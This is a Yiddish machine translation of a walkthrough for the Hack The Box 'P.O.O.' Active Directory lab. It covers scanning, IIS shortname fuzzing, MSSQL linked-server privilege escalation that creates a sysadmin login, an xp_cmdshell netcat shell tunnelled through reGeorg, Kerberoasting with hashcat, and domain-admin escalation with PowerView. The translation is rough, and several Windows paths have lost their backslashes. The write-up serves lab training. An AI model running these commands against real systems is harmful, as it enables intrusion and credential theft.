ืืื ืืขื ืึทืจืืืงื ืืืจ ืืืขืื ืคืื ืึทื ืืขืจืงืืืึทืื ืื ืืืจืืคืึธืจ ืคืื ื ืื ืืืืื ืึท ืืึทืฉืื, ืึธืืขืจ ืึท ืืึทื ืฅ ืืื ื-ืืึทืืึธืจืึทืืึธืจืืข ืคืื โโืืขื ืคึผืืึทืฅ
ืืื ืกืืืืืื ืืื ืื ืืึทืฉืจืืึทืืื ื, POO ืืื ืืืืืื ื ืฆื ืคึผืจืืืืจื ืกืงืืื ืืื ืึทืืข ืกืืึทืืขืก ืคืื ืื ืคืืื ืืื ืึท ืงืืืื ืึทืงืืืื Directory ืกืืืืืืข. ืืขืจ ืฆืื ืืื ืฆื ืงืึธืืคึผืจืึธืืืก ืึท ืฆืืืจืืืืขื ืืึทืืขืืึธืก, ืขืกืงืึทืืืื ืคึผืจืืืืืืึทืืืฉืึทื ืืื ืืขืกืึธืฃ ืงืึธืืคึผืจืึธืืืก ืื ืืื ืฆืข ืคืขืื ืืฉืขืช ืงืึทืืขืงืืื ื 5 ืคืืึทืืก.
ืคึฟืึทืจืืื ืืื ื ืฆื ืืขืจ ืืึทืืึธืจืึทืืึธืจืืข ืืื ืืืจื ืืืคึผื. ืขืก ืืื ืจืขืงืึทืืขื ืืื ื ืืฉื ืฆื ืคืึทืจืืื ืื ืคึฟืื ืึท ืึทืจืืขื ืงืึธืืคึผืืืืขืจ ืึธืืขืจ ืคึฟืื ืึท ืืึทืืขืืึธืก ืืื ืขืก ืืขื ืขื ืืืืืืืง ืืึทืื ืคึฟืึทืจ ืืืจ, ืืืืึทื ืืืจ ืขื ืืืงื ืืื ืืืืฃ ืึท ืคึผืจืืืืึทื ื ืขืฅ ืืื ืืขื ืืฉื ืืืึธืก ืืืืกื ืขืคึผืขืก ืืื ืื ืคืขืื ืคืื ืืื ืคึฟืึธืจืืึทืฆืืข ืืืืขืจืืืื :)
ืึธืจืืึทื ืึทืืืืฉืึทื ืึทื ืืื ืคึฟืึธืจืืึทืฆืืข
ืฆื ืืขืืคื ืืืจ ืืืืืื ืืขืจืืืึทื ืืืงื ืืื ื ืืึทืข ืึทืจืืืงืืขื, ืืืืืืืืืจื ืืื ืื ืืขืจืข ืืื ืคึฟืึธืจืืึทืฆืืข, ืืื ืืึธืื ืืืฉืืคื
ืื ืืื ืคึฟืึธืจืืึทืฆืืข ืืื ืืขืจืืื ืื ืืืืื ืคึฟืึทืจ ืืืืืื ืืงืจืืื ืฆืืืขืงื. ืืขืจ ืืืืจ ืคืื ืืขื ืืึธืงืืืขื ื ืืื ื ืืฉื ืึธื ื ืขืืขื ืงืืื ืคึฟืึทืจืึทื ืืืืึธืจืืืขืืงืืื ืคึฟืึทืจ ืงืืื ืฉืขืืืงื ืืขืคึฟืืจื ืฆื ืืืขืจ ืขืก ืื ืืื ืึท ืจืขืืืืืึทื ืคืื ืื ื ืืฆื ืคืื ืืืืกื ืืื ืืขืงื ืืงืก ืืืงืืืขื ืคืื ืืขืจื ืขื ืืขื ืืึธืงืืืขื ื.
ืื ืืจืึธ
ืืขืจ ืกืืฃ ืฉืคึผืื ืืืฉืืืื ืคืื ืฆืืืื ืืืฉืื ืขื, ืืื ืึผืืื 5 ืคืืึทืืก.
ื ืืึทืฉืจืืึทืืื ื ืืื ืึทืืจืขืก ืคืื ืื ืื ืืืฆื ืืึทืืขืืึธืก ืืื ืืืื ืืขืืขืื.
ืืื ืก ืืึทืงืืืขื ืกืืึทืจืืขื!
ืจืขืงืึธื ืคืึธื
ืืขืจ ืืึทืฉืื ืืื ืึทื IP ืึทืืจืขืก ืคืื 10.13.38.11, ืืืึธืก ืืื ืืืืื ืฆื /etc/hosts.
10.13.38.11 poo.htb
ืขืจืฉืืขืจ ืคืื ืึทืืข, ืืืจ ืืืขืจืงืืงื ืขืคืขื ืขื ืคึผืึธืจืฅ. ืืื ื ืกืงืึทื ืื ื ืึทืืข ืคึผืึธืจืฅ ืืื nmap ื ืขืื ืึท ืืึทื ื ืฆืืึทื, ืืื ืืืขื ืขืจืฉืืขืจ ืืึธื ืืึธืก ืืื ืืึทืกืกืงืึทื. ืืืจ ืืืขืจืงืืงื ืึทืืข TCP ืืื UDP ืคึผืึธืจืฅ ืคึฟืื ืื tun0 ืฆืืืื ื ืืื ืึท ืืืืงืืึทื ืคืื 500 ืคึผืึทืงืืฅ ืคึผืขืจ ืกืขืงืื ืืข.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
ืืืฆื, ืฆื ืืึทืงืืืขื ืืขืจ ืืืืืืื ืืื ืคึฟืึธืจืืึทืฆืืข ืืืขืื ืื ืกืขืจืืืืกืขืก ืืืึธืก ืืืืคื ืืืืฃ ืื ืคึผืึธืจืฅ, ืืึธืื ืืื ืื ืืืขืจืงืืงื ืืื ืื -A ืึธืคึผืฆืืข.
nmap -A poo.htb -p80,1433
ืึทืืื ืืืจ ืืึธืื IIS ืืื MSSQL ืืึทืืื ืื ืืก. ืืื ืืขื ืคืึทื, ืืืจ ืืืขืื ืืขืคึฟืื ืขื ืื ืคืึทืงืืืฉ ืื ืก ื ืึธืืขื ืคืื ืื ืคืขืื ืืื ืงืึธืืคึผืืืืขืจ. ืืืืฃ ืื ืืืขื ืกืขืจืืืขืจ ืืืจ ืืขื ืขื ืืึทืืจืืกื ืืืจื ืื IIS ืืืื ืืืึทื.
ืืื ืก ืืืื ืืืจื ืื ืืืจืขืงืืขืจืื. ืืื ื ืืฆื ืืึธืืืกืืขืจ ืคึฟืึทืจ ืืขื. ืืื ืื ืคึผืึทืจืึทืืขืืขืจืก ืืืจ ืึธื ืืืืึทืื ืื ื ืืืขืจ ืคืื ืคึฟืขืืขื 128 (-ื), URL (-ื), ืืืขืจืืขืจืืื (-ืื) ืืื ืืงืกืืขื ืฉืึทื ื ืืืึธืก ืืื ืืขืจืขืก ืืื ืื (-ืจืขื ืืืขื ).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
ืืึธืก ืืื ืืื ืื ืืืืคึผ ืึธืืขื ืืึทืงืืืฉืึทื ืคึฟืึทืจ ืื / ืึทืืืื ืืืขืืืืืึทืืขืจ, ืืื ืืขืืื ื ืืื ืึท ืฆืืืจืืืืขื ืืขืกืงืืึทืคึผ ืืื ืกื .DS_Store ืืขืงืข. .DS_Store ืืขื ืขื ืืขืงืขืก ืืืึธืก ืงืจืึธื ืื ืื ืกืขืืืื ืืก ืคึฟืึทืจ ืึท ืืขืงืข, ืึทืืึท ืืื ืึท ืจืฉืืื ืคืื ืืขืงืขืก, ืืืงืึทื ืืึธืืงืืืฉืึทื ื ืืื ืื ืืืืกืืขืงืืืื ืืื ืืขืจืืจืื ื ืืืื. ืึทืืึท ืึท ืืขืงืข ืงืขื ืกืืฃ ืึทืจืืืฃ ืืื ืื ืืืขื ืกืขืจืืืขืจ ืืืขืืืืืึทืืขืจ ืคืื ืืืขื ืืขืืืขืืึธืคึผืขืจืก. ืืื ืืขื ืืืขื ืืืจ ืืึทืงืืืขื ืืื ืคึฟืึธืจืืึทืฆืืข ืืืขืื ืื ืืื ืืึทืื ืคืื ืื ืืืขืืืืืึทืืขืจ. ืคึฟืึทืจ ืืขื ืืืจ ืงืขื ืขื ื ืืฆื
python3 dsstore_crawler.py -i http://poo.htb/
ืืืจ ืืึทืงืืืขื ืื ืืื ืืึทืื ืคืื ืื ืืืขืืืืืึทืืขืจ. ืื ืืขืจืกื ืืฉืืงืึทืืืข ืืึทื ืืึธ ืืื ืื / dev ืืืขืืืืืึทืืขืจ, ืคึฟืื ืืืึธืก ืืืจ ืงืขื ืขื ืงืืงื ืืื ืื ืงืืืืื ืืื ืื ืืขืงืขืก ืืื ืฆืืืื ืฆืืืืืื. ืึธืืขืจ ืืืจ ืงืขื ืขื ื ืืฆื ืื ืขืจืฉืืขืจ 6 ืืืชืืืช ืคืื ืืขืงืข ืืื ืืืขืืืืืึทืืขืจ ื ืขืืขื ืืืื ืื ืกืขืจืืืืก ืืื ืฉืคึผืืจืขืืืืืง ืฆื IIS ShortName. ืืืจ ืงืขื ืขื ืงืึธื ืืจืึธืืืจื ืคึฟืึทืจ ืืขื ืืืึทืื ืขืจืึทืืืืืื ื ืืฆื
ืืื ืืืจ ืืขืคึฟืื ืขื ืืืื ืืขืงืกื ืืขืงืข ืืืึธืก ืกืืึทืจืฅ ืืื "ืคึผืึธืึธ_ืงืึธ". ื ืื ืืขืืืืืกื ืืืึธืก ืฆื ืืึธื ืืืืึทืืขืจ, ืืื ืคืฉืื ืืืืกืืขืงืืืื ืึทืืข ืื ืืืขืจืืขืจ ืกืืึทืจืืื ื ืืื "ืงืึธ" ืคืื ืื ืืืขืืืืืึทืืขืจ ืืืขืจืืขืจืืื.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
ืืื ืืืจ ืืืขืื ืกืึธืจื ืขืก ืืืืก ืืื wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
ืืื ืืืจ ืืขืคึฟืื ืขื ืื ืจืขืื ืืืึธืจื! ืืืจ ืงืืงื ืืื ืืขื ืืขืงืข, ืจืึทืืขืืืขื ืื ืงืจืึทืืขื ืืฉืึทืื (ืืืื ืื DBNAME ืคึผืึทืจืึทืืขืืขืจ, ืืื ืืขื ืขื ืคึฟืื MSSQL).
ืืืจ ืึทืจืืืกืืขืื ืื ืคืึธื ืืื ืืืจ ืฉืืืึทืื 20%.
ืื ืคืึธื
ืืืจ ืคืึทืจืืื ืื ืฆื MSSQL, ืืื ื ืืฆื DBeaver.
ืืืจ ืืึธื ื ืื ืืขืคึฟืื ืขื ืขืคึผืขืก ืืฉืืงืึทืืืข ืืื ืืขื ืืึทืืึทืืืืก, ืืึธืื ืืื ืื ืฉืึทืคึฟื ืึท ืกืงื ืขืืืืึธืจ ืืื ืงืึธื ืืจืึธืืืจื ืืืึธืก ื ืืฆืขืจืก ืขืก ืืขื ืขื.
SELECT name FROM master..syslogins;
ืืืจ ืืึธืื ืฆืืืื ื ืืฆืขืจืก. ืืึธืืืจ ืงืึธื ืืจืึธืืืจื ืืื ืืืขืจ ืคึผืจืืืืืืึทืืืฉืึทื.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
ืืืื, ืขืก ืืขื ืขื ืงืืื ืคึผืจืืืืืืึทืืืฉืึทื. ืืื ืก ืงืืง ืืื ืืื ืืงื ืกืขืจืืืขืจืก, ืืื ืืขืฉืจืืื ืืืขืื ืืขื ืืขืื ืืง ืืื ืืขืืึทื
SELECT * FROM master..sysservers;
ืืึธืก ืืื ืืื ืืืจ ืืขืคึฟืื ืขื ืื ืื ืืขืจ SQL ืกืขืจืืืืจืขืจ. ืืึธืืืจ ืคึผืจืืืืจื ืื ืืืจืืคืืจืื ื ืคืื ืงืึทืืึทื ืื ืืืืฃ ืืขื ืกืขืจืืืขืจ ื ืืฆื ืึธืคึผืขื ืงืืืขืจื ().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
ืืื ืืืจ ืงืขื ืขื ืืคืืื ืืืืขื ืึท ืึธื ืคึฟืจืขื ืืืื.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
ืื ืคืื ื ืืื ืึทื ืืืขื ืืืจ ืืึทืื ืึท ืืงืฉื ืฆื ืึท ืืื ืืงื ืกืขืจืืืขืจ, ืื ืืขืื ืืื ืขืงืกืึทืงืืืืึทื ืืื ืืขื ืงืึธื ืืขืงืกื ืคืื ืื ืื ืืขืจ ืืึทื ืืฆืขืจ! ืืึธืืืจ ืืขื ืืื ืืขื ืงืึธื ืืขืงืกื ืคืื ืืืึธืก ืืึทื ืืฆืขืจ ืืืจ ืึทืจืืขืื ืืืืฃ ืึท ืืื ืืงื ืกืขืจืืืขืจ.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
ืืืฆื ืืึธืืืจ ืืขื ืืื ืืืึธืก ืงืึธื ืืขืงืกื ืึท ืืงืฉื ืืื ืืขืืืื ืคืื ืึท ืืื ืืงื ืกืขืจืืืขืจ ืฆื ืืื ืืืขืจ!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
ืึทืืื ืขืก ืืื ืื DBO ืงืึธื ืืขืงืกื ืืืึธืก ืืึธื ืืึธืื ืึทืืข ืื ืคึผืจืืืืืืึทืืืฉืึทื. ืืึธืืืจ ืงืึธื ืืจืึธืืืจื ืื ืคึผืจืืืืืืึทืืืฉืึทื ืืื ืคืึทื ืคืื ืึท ืืงืฉื ืคืื ืึท ืืื ืืงื ืกืขืจืืืขืจ.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
ืืื ืืืจ ืงืขื ืขื ืืขื, ืืืจ ืืึธืื ืึทืืข ืื ืคึผืจืืืืืืึทืืืฉืึทื! ืืึธืืืจ ืืึทืื ืืื ืืืขืจ ืืืืืขื ืข ืึทืืืื ืืกืืจืึทืืึธืจ ืืื ืืึธืก. ืึธืืขืจ ืืื ืืึธื ื ืื ืืึธืื ืขืก ืืืจื ืึธืคึผืขื ืงืืืขืจื, ืืึธืื ืืื ืื ืืึธื ืืึธืก ืืืจื EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
ืืื ืืืฆื ืืืจ ืคืึทืจืืื ืื ืืื ืื ืงืจืึทืืขื ืืฉืึทืื ืคืื ืื ื ืืึทืข ืืึทื ืืฆืขืจ, ืืืจ ืึธืืกืขืจืืืืจื ืื ื ืืึทืข ืคืึธื ืืึทืืึทืืืืก.
ืืืจ ืืขืื ืืืืขืจ ืืขื ืคืึธื ืืื ืืืื ืืืืฃ.
ืืึทืงืืจืึทืงืง ืคืึธื
ืืึธืืืจ ืืึทืงืืืขื ืึท ืฉืึธื ื ืืฆื MSSQL, ืืื ื ืืฆื mssqlclient ืคึฟืื ืื ืืืคึผืึทืงื ืคึผืขืงื.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
ืืืจ ืืึทืจืคึฟื ืฆื ืืึทืงืืืขื ืคึผืึทืกืืืขืจืื, ืืื ืืขืจ ืขืจืฉืืขืจ ืืึทื ืืืจ ืืึธืื ืฉืืื ืืขืคึผืืึธื ืืขืจื ืืื ืึท ืืืขืืืืืื. ืืืื, ืืืจ ืืึทืจืคึฟื ืึท ืืืขื ืกืขืจืืืขืจ ืงืึทื ืคืืืืขืจืืืฉืึทื (ืขืก ืืื ื ืื ืืขืืืขื ืฆื ืืึธืื ืึท ืืึทืงืืืขื ืฉืึธื, ืืฉืืขืืช ืื ืคืืืจืืืึทื ืืื ืคืืืกื ืืืง).
ืืืขืจ ืฆืืืจืื ืืื ืืขืืืืงื ื. ืืึธืืฉ ืืืจ ืงืขื ืขื ืืืืขื ืขื ืื ืืขืงืข ืคึฟืื MSSQL, ืืืจ ื ืึธืจ ืืึทืจืคึฟื ืฆื ืืืืกื ืืืึธืก ืคึผืจืึธืืจืึทืืืื ื ืฉืคึผืจืึทืื ืืขื ืขื ืงืึทื ืคืืืืขืจื. ืืื ืืื ืื MSSQL ืืืขืืืืืึทืืขืจ ืืืจ ืืขืคึฟืื ืขื ืึทื ืขืก ืืื ืคึผืืืืึธื.
ืืขืจื ืึธื ืขืก ืืื ืงืืื ืคึผืจืึธืืืขื ืฆื ืืืืขื ืขื ืื ืืืขื.ืงืึธื ืคืื ืืขืงืข.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
ืืื ืื ืืขืคึฟืื ืขื ืงืจืึทืืขื ืืฉืึทืื, ืืืื ืฆื / ืึทืืืื ืืื ื ืขืืขื ืื ืคืึธื.
ืคืึธืึธืืืึธืื ืคืึธื
ืืื ืคืึทืงื, ืขืก ืืขื ืขื ืขืืืขืืข ืื ืงืึทื ืืืื ืืึทื ืกืื ืคืื ื ืืฆื ืึท ืคืืืจืืืึทื, ืึธืืขืจ ืืืจ ืืืื ืืืจื ืื ื ืขืฅ ืกืขืืืื ืืก, ืืืจ ืืึทืืขืจืงื ืึทื IPv6 ืืื ืืืื ืืขื ืืฆื!
ืืึธืืืจ ืืืืื ืืขื ืึทืืจืขืก ืฆื /etc/hosts.
dead:babe::1001 poo6.htb
ืืึธืืืจ ืืืขืจืงืืงื ืืขื ืืึทืืขืืึธืก ืืืืืขืจ, ืึธืืขืจ ื ืืฆื ืื IPv6 ืคึผืจืึธืืึธืงืึธื.
ืืื ืื WinRM ืกืขืจืืืืก ืืื ืืืจืขืืืืื ืืืืขืจ IPv6. ืืื ืก ืคืึทืจืืื ืื ืืื ืื ืืขืคึฟืื ืขื ืงืจืึทืืขื ืืฉืึทืื.
ืขืก ืืื ืึท ืคืึธื ืืืืฃ ืื ืืขืกืงืืึทืคึผ, ืืืจ ืืขืื ืขืก ืืืืขืจ.
ืคึผ00ื ืขื ืคืึธื
ื ืึธื ืงืึทื ืืึทืงืืื ื ืจืืงืึทื ืึทืกืึทื ืก ืืืืฃ ืืขืจ ืืึทืืขืืึธืก ื ืืฆื
setspn.exe -T intranet.poo -Q */*
ืืึธืืืจ ืืืืคื ืื ืืึทืคึฟืขื ืืืจื MSSQL.
ืืื ืืขื ืืืคึฟื, ืืืจ ืืึทืงืืืขื ืื SPN ืคืื ื ืืฆืขืจืก p00_hr ืืื p00_adm, ืืืึธืก ืืืื ืึทื ืืื ืืขื ืขื ืฉืคึผืืจืขืืืืืง ืฆื ืึท ืืึทืคืึทืื ืึทืืึท ืืื Kerberoasting. ืืื ืงืืจืฅ, ืืืจ ืงืขื ืขื ืืึทืงืืืขื ืืืืขืจ ืคึผืึทืจืึธื ืืึทืฉืขืก.
ืขืจืฉืืขืจ ืืืจ ืืึทืจืคึฟื ืฆื ืืึทืงืืืขื ืึท ืกืืึทืืื ืฉืึธื ืืื ืึท MSSQL ืืึทื ืืฆืขืจ. ืึธืืขืจ ืืื ื ืืืจ ืืขื ืขื ืืืืืืขื ืืื ืึทืงืกืขืก, ืืืจ ืืึธืื ืงืึธืืื ืืงืึทืฆืืข ืืื ืืขืจ ืืึทืืขืืึธืก ืืืืื ืืืจื ืคึผืึธืจืฅ 80 ืืื 1433. ืึธืืขืจ ืขืก ืืื ืืขืืืขื ืฆื ืืื ืขื ืคืึทืจืงืขืจ ืืืจื ืคึผืึธืจื 80! ืคึฟืึทืจ ืืขื ืืืจ ืืืขืื ื ืืฆื
ืืืขืจ ืืืขื ืืืจ ืคึผืจืืืืจื ืฆื ืึทืงืกืขืก ืขืก, ืืืจ ืืึทืงืืืขื ืึท ืืขืืช 404. ืืขื ืืืื ืึทื *.ืึทืกืคึผืงืก ืืขืงืขืก ืืขื ืขื ื ืืฉื ืขืงืกืึทืงืืืืึทื. ืึผืื ืืขืงืขืก ืืื ืื ืืงืกืืขื ืฉืึทื ื ืืึธื ืืืื ืขืงืกืึทืงืืืืึทื, ืื ืกืืึทืืืจื ASP.NET 4.5 ืืื ืืืื.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
ืืื ืืืฆื, ืืืขื ืืืจ ืึทืงืกืขืก tunnel.aspx, ืืืจ ืืึทืงืืืขื ืึท ืขื ืืคืขืจ ืึทื ืึทืืฅ ืืื ืืจืืื ืฆื ืืืื.
ืืึธืืืจ ืงืึทืืขืจ ืืขื ืงืืืขื ื ืืืื ืคืื ืื ืึทืคึผืืึทืงืืืฉืึทื, ืืืึธืก ืืืขื ืจืขืืข ืคืึทืจืงืขืจ. ืืืจ ืืืขืื ืคืึธืจืืืก ืึทืืข ืคืึทืจืงืขืจ ืคืื ืคึผืึธืจื 5432 ืฆื ืื ืกืขืจืืืขืจ.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
ืืื ืืืจ ื ืืฆื ืคึผืจืึทืงืกืืืฉืึทืื ืก ืฆื ืฉืืงื ืคืึทืจืงืขืจ ืคืื ืงืืื ืึทืคึผืืึทืงืืืฉืึทื ืืืจื ืืื ืืืขืจ ืคึผืจืึทืงืกื. ืืึธืืืจ ืืืืื ืืขื ืคืจืืงืกื ืฆื ืื ืงืึทื ืคืืืืขืจืืืฉืึทื ืืขืงืข /etc/proxychains.conf.
ืืืฆื ืืึธืื ืก ืฆืืคึฟืขืืืงืขืจ ืื ืคึผืจืึธืืจืึทื ืฆื ืื ืกืขืจืืืขืจ
ืืืฆื ืืืจ ืงืึทืืขืจ ืื ืืืกื ืขืจ ืืืจื MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
ืืื ืืืจ ืคืึทืจืืื ืื ืืืจื ืืื ืืืขืจ ืคึผืจืึทืงืกื.
proxychains rlwrap nc poo.htb 4321
ืืื ืืึธืืืจ ื ืขืืขื ืื ืืึทืฉืื.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
ืืืืึทืืขืจ ืืืจ ืืึทืจืคึฟื ืฆื ืืืขืจืืื ืืืืขืจ ืื ืืึทืฉืขืก. ืืื ื ืื Rockyou ืืืขืจืืขืจืืื ืืื ื ืืฉื ืึทื ืืืึทืืื ืื ืคึผืึทืกืืืขืจืื, ืืื ืืขืืืืื ื ืึทืืข ืื ืคึผืึทืกืืืขืจืื ืืืงืฉืึทื ืขืจืื ืฆืืืขืฉืืขืื ืืื Seclists. ืคึฟืึทืจ ืื ืืืื ืืืจ ื ืืฆื hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
ืืื ืืืจ ืืขืคึฟืื ืขื ืืืืืข ืคึผืึทืกืืืขืจืื, ืืขืจ ืขืจืฉืืขืจ ืืื ืื ืืืขืจืืขืจืืื dutch_passwordlist.txt, ืืื ืื ืจืืข ืืื Keyboard-Combinations.txt.
ืืื ืึทืืื ืืืจ ืืึธืื ืืจืื ืืืืขืจื, ืืึธืื ืืื ืื ืืืื ืฆื ืื ืคืขืื ืงืึทื ืืจืึธืืืขืจ. ืขืจืฉืืขืจ ืืืจ ืืขืคึฟืื ืขื ืืืืก ืืืื ืึทืืจืขืก.
ืืจืืืก, ืืืจ ืืขืคึฟืื ืขื ืื IP ืึทืืจืขืก ืคืื ืื ืคืขืื ืงืึทื ืืจืึธืืืขืจ. ืืึธืืืจ ืืขืคึฟืื ืขื ืึทืืข ืื ื ืืฆืขืจืก ืคืื ืื ืคืขืื, ืืื ืืืึธืก ืคืื ืืื ืืื ืึท ืึทืืืื ืืกืืจืึทืืึธืจ. ืฆื ืึธืคึผืืึธืืืจื ืื ืฉืจืืคื ืฆื ืืึทืงืืืขื ืืื ืคึฟืึธืจืืึทืฆืืข PowerView.ps1. ืืขืจื ืึธื ืืืจ ืืืขืื ืคืึทืจืืื ืื ืืื Evil-winrm, ืกืคึผืขืฆืืคืืฆืืจื ืื ืืืขืืืืืึทืืขืจ ืืื ืื ืฉืจืืคื ืืื ืื -s ืคึผืึทืจืึทืืขืืขืจ. ืืื ืืขืืึธืื ืืืจ ื ืึธืจ ืืึธืื ืื PowerView ืฉืจืืคื.
ืืืฆื ืืืจ ืืึธืื ืฆืืืจืื ืฆื ืึทืืข ืืืึทื ืคืึทื ืืงืฉืึทื ื. ืืขืจ p00_adm ืืึทื ืืฆืขืจ ืงืืงื ืืื ืึท ืคึผืจืืืืืืืืฉื ืืึทื ืืฆืขืจ, ืึทืืื ืืืจ ืืืขืื ืึทืจืืขืื ืืื ืืืื ืงืึธื ืืขืงืกื. ืืึธืืืจ ืืึทืื ืึท PSCredential ืืืืคืขืฅ ืคึฟืึทืจ ืืขื ืืึทื ืืฆืขืจ.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
ืืืฆื ืึทืืข ืคึผืึธืืืขืจืฉืขืื ืงืึทืืึทื ืื ืืื ืืืจ ืกืคึผืขืฆืืคืืฆืืจื ืงืจืขืืก ืืืขื ืืืื ืขืงืกืึทืงืืืืึทื ืืื p00_adm. ืืึธืื ืืื ืื ืืืืึทืื ืึท ืจืฉืืื ืคืื ืืืืขืจื ืืื ืื ืึทืืจืืืืื ืคืื AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
ืืื ืึทืืื, ืืื ืืืขืจ ืืึทื ืืฆืขืจ ืืื ืืึทืงืข ืืืื. ืืึธืืืจ ืืขื ืืื ืืืึธืก ืืจืืคึผืขืก ืขืจ ืืื.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
ืืืจ ืืขืกืึธืฃ ืืึทืฉืืขืืืงื ืึทื ืืขืจ ืืึทื ืืฆืขืจ ืืื ืึท ืคืขืื ืึทืืืื ืืกืืจืึทืืึธืจ. ืืึธืก ืืื ืืื ืื ืจืขืื ืฆื ืจืืืึธืืืื ืงืืึธืฅ ืืืืฃ ืฆื ืื ืคืขืื ืงืึทื ืืจืึธืืืขืจ. ืืื ืก ืคึผืจืืืืจื ืืึธืืื ื ืืื ืืืจื WinRM ื ืืฆื ืืื ืืืขืจ ืืื ืขื. ืืื ืืื ืืขืืืขื ืฆืขืืืฉื ืืืจื ืื ืขืจืจืึธืจืก ืืขืฉืืคื ืืืจื reGeorg ืืืขื ืืื ื ืืฆื evil-winrm.
ืืขืจื ืึธื ืืึธืื ืืื ืื ื ืืฆื ืื ืืขืจื, ืืจืื ืืขืจ ืืืื ืขืจ,
ืืืจ ืคึผืจืืืืจื ืฆื ืคืึทืจืืื ืื, ืืื ืืืจ ืืขื ืขื ืืื ืื ืกืืกืืขื.
ืืืขืจ ืขืก ืืื ืงืืื ืคืึธื. ืืขืจื ืึธื ืงืืง ืื ืืึทื ืืฆืขืจ ืืื ืงืึธื ืืจืึธืืืจื ืื ืืขืกืงืืึทืคึผืก.
ืืืจ ืืขืคึฟืื ืขื ืื ืคืึธื ืืื mr3ks ืืื ืื ืืึทืืึธืจืึทืืึธืจืืข ืืื 100% ืืขืขื ืืืงื.
ืึทื ืก ืึทืืข. ืืื ืึท ืืึทืืขืจืงืื ืืขื, ืืืืข ืืึทืืขืจืงืื ื ืฆื ืืืจ ืืขืืขืจื ื ืขืคึผืขืก ื ืืึท ืคืื ืืขื ืึทืจืืืงื ืืื ืฆื ืขืก ืืื ื ืืฆืืง ืคึฟืึทืจ ืืืจ.
ืืืจ ืงืขื ืขื ืคืึทืจืืื ืื ืืื ืื ืืื
ืืงืืจ: www.habr.com